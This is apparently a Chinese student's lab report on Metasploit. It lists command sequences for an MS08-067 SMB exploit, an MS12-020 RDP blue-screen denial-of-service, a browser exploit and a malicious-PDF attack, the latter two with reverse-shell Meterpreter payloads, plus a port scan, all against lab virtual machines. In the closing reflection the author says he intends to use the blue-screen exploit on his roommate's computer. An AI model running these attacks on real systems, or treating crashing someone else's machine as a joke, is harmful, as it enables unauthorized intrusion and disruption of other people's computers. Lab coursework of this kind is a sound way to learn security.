本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体须要完成:html
1.1一个主动攻击实践(1分)shell
1.2 一个针对浏览器的攻击(1分)windows
1.3 一个针对客户端的攻击(1分)api
1.4 成功应用任何一个辅助模块。(0.5分)浏览器
(1)用本身的话解释什么是exploit,payload,encode.安全
关于漏洞MS08_067的原理tcp
msfconsole
进入msf控制台
search ms08_067
查看该漏洞
use exploit/windows/smb/ms08_067_netapi
使用该漏洞
show payloads
回链攻击载荷工具
set LHOST 192.168.70.131 //攻击机的ip地址 set LPORT 5231 //攻击的端口 set RHOST 192.168.70.140 //靶机的ip地址 set target 0 //选择目标系统类型 exploit //进行攻击
关闭防火墙,改变安全策略,查看445端口情况,甚至改变winxp版本,由中文版改为英文版
很遗憾始终是只能检测出系统却没法生成有效的会话编码
攻击方:kali 192.168.70.131
靶机:win7 192.168.70.130spa
输入msfconsole指令,打开控制台;
依次输入如下指令进行设置与攻击:
set payload windows/x64/meterpreter/reverse_tcp //选择攻击载荷 set LHOST 192.168.70.131 //设置攻击方ip set RHOST 192.168.70.130 //设置靶机ip
exploit
链接成功
尝试命令查看靶机ip
攻击机kali 192.168.70.131
靶机windows 7 192.168.70.130
用kali自带的的扫描工具nmap 查看靶机是否开启3389端口。(没开就把他打开!)
扫描以后发现3389是开放的,而后启动msfconsole, 利用里面的模块查看是否存在Ms12-020漏洞。
查询模块
set RHOST 192.168.70.130 //设置靶机地址
而后exploit
100%表示能够攻击
攻击模块
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //加载攻击模块 set RHOST 192.168.70.130 //设置靶机地址
而后仍是exploit
出现seems down说明靶机已经蓝上了!
主机 kali 192.168.70.131
靶机 Windows XP SP3 192.168.70.141
set payload windows/meterpreter/reverse_tcp set LHOST 192.168.70.131 set LPORT 2016 set URIPATH wyhy
而后exploit
开启监听,而后生成网址,将这个网址在靶机打开后攻击机就捕获了靶机,创建会话
攻击方:kali 192.168.70.131
靶机:winxp 192.168.70.141
输入msfconsole指令,打开控制台;
依次输入如下指令进行设置
set payload windows/meterpreter/reverse_tcp //设置tcp反向链接 set LHOST 192.168.70.131//攻击方IP set LPORT 5231 //攻击方攻击端口 set FILENAME wyhy_exp5.pdf
use exploit/multi/handler //进入监听模块 set payload windows/meterpreter/reverse_tcp //设置tcp反向链接 set LHOST 192.168.70.131 //攻击方IP set LPORT 5231 //攻击方攻击端口 exploit //监听
使用auxiliary/scanner/portscan/tcp
模块,用来扫描靶机的TCP端口使用状况;
执行命令use auxiliary/scanner/portscan/tcp
进入并使用模块;
show options
查看须要设置的参数信息,设置靶机的ip为RHOST
set PORT 1-5231
而后expolit
exploit
:英文翻译为利用,黑客就是利用漏洞对电脑进行攻击,有漏洞不必定能够利用,但能够利用的必定有漏洞。payload
:有效载荷。一般在传输数据时,为了使数据传输更可靠,要把原始数据分批传输,而且在每一批数据的头和尾都加上必定的辅助信息,而其中的原始数据就是payloadencode
:编码器,用来给payload进行编码,保护payload不被发现实战?首先咱们只能在本身的局域网内实现。对于外网,不在同一子网下的地址锁定没法实现就没法实战攻击,我以为这是目前最大缺憾。
此次我最喜欢的就是那个蓝屏漏洞,在CSDN上逛到的觉得我是独一无二结果……不过仍是以为那个很好玩,起初想作这个是想搞一下正在打Apex的室友让他感觉一下快要吃鸡蓝个屏,可是系统版本高了没啥用。后续我会继续利用更新的漏洞让室友感觉吃不到鸡的乐趣o( ̄▽ ̄)o